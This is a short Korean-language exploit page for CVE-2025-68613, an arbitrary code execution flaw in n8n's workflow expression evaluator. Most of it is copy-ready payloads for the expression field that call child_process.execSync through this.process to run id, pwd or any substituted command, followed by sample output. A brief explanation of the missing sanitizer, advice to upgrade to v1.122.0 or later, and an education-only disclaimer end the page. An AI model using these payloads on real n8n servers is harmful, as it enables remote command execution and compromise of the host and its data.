
CVE-2025-68613: n8n RCE 취약점 익스플로잇 및 문서
n8n은 워크플로 표현식 평가 시스템에 치명적인 임의 코드 실행 취약점을 포함하고 있습니다. 특정 조건에서 워크플로 구성 중 인증된 사용자가 제공한 표현식이 기본 런타임에서 충분히 격리되지 않은 실행 컨텍스트에서 평가될 수 있습니다.
다음 페이로드를 표현식 필드에 붙여넣기:
{{ (function(){ return this.process.mainModule.require('child_process').execSync('id').toString() })() }}

ID 명령:
{{ (function(){ return this.process.mainModule.require('child_process').execSync('id').toString() })() }}
PWD 명령:
{{ (function(){ return this.process.mainModule.require('child_process').execSync('pwd').toString() })() }}
사용자 지정 명령 템플릿:
{{ (function(){ return this.process.mainModule.require('child_process').execSync('COMMAND').toString() })() }}
id 명령의 경우:
uid=1000(node) gid=1000(node) groups=1000(node)
pwd 명령의 경우:
/app
표현식 평가기에는 함수 표현식이 this.process(Node.js 프로세스 객체)에 접근하는 것을 방지하는 새니타이저가 없어 시스템 모듈에 접근할 수 있습니다.
n8n v1.122.0 이상으로 업그레이드하십시오.
고지사항: 이 정보는 샌드박스 및 교육 목적으로만 제공됩니다. 이 정보를 사용하여 시스템을 무단으로 악용하는 것은 불법적이고 비윤리적입니다. 취약점을 테스트하거나 악용하기 전에 항상 적절한 승인을 받으십시오.